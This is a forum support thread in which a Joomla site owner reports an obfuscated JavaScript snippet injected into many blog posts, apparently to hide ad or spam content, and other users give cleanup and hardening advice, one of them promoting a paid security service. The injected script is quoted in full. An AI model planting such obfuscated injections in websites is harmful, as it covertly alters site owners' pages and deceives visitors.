Found Code Hidden in HTML of Posts

[qdsouza]

I have found this code in many of my posts over the last few weeks. It seems to add a whole bunch of ads at the bottom of my posts. I upgraded from 1.5.24 to 1.5.26 today.

Is there a way to quickly delete the code from the posts. And secure the site so that it doesn't happen again?

Thanks,

Quentin

Code: Select all

<script type="text/javascript">// <![CDATA[
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');
// ]]></script>

[duyet]

Did you try to remove the listed code from and see if things still work? Do make a copy of your file before doing anything. If thing no longer work, then you can remove:

Code: Select all

document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');

This writes the message in your post.

These kind of hidden message/link comes with the free template or extension. Do check them before use.

[qdsouza]

I used MYPHPADMIN and reviewed/removed all the offending code. I used http://sitecheck.sucuri.net/scanner/ to do another check of the site as well. It seems to be all gone.

I also removed all the plugins that I wasn't using and modules. Template is my own.

How does one test modules/plugins/components that come from the Extensions Directory for bad code before one installs it?

Thanks,

Quentin

[duyet]

Anyone can submit their extension, but no one is checking them. Use at your own risk. It's up to you to scan them ...

[PolishedGeek]

You have been hacked, and although you have removed the rogue code, the fact is whatever made you vulnerable in the first place will just let it happen again until you shore up the security of your site.

It's important to completely scan your site for all malware and then update and plug ALL of your security holes. There are many tools to do this yourself available now (Manage My Joomla is a great one, if you understand the technical side of things well enough to use it effectively: http://myjoomla.com/ )

If you aren't comfortable with doing it yourself, you can also hire an experienced developer to help you analyze and secure the site. And then you can get ongoing monitoring services to help more proactively reduce your risks from hackers. We offer a professional service called JoomlaProtect! if you are interested in letting someone else handle it for you: http://JoomlaProtect.com

We also recommend RS!Firewall (and we install it for all of our JoomlaProtect! clients)

[mandville]

have you looked at this post http://forum.joomla.org/viewtopic.php?f=432&t=475313or checklist 7?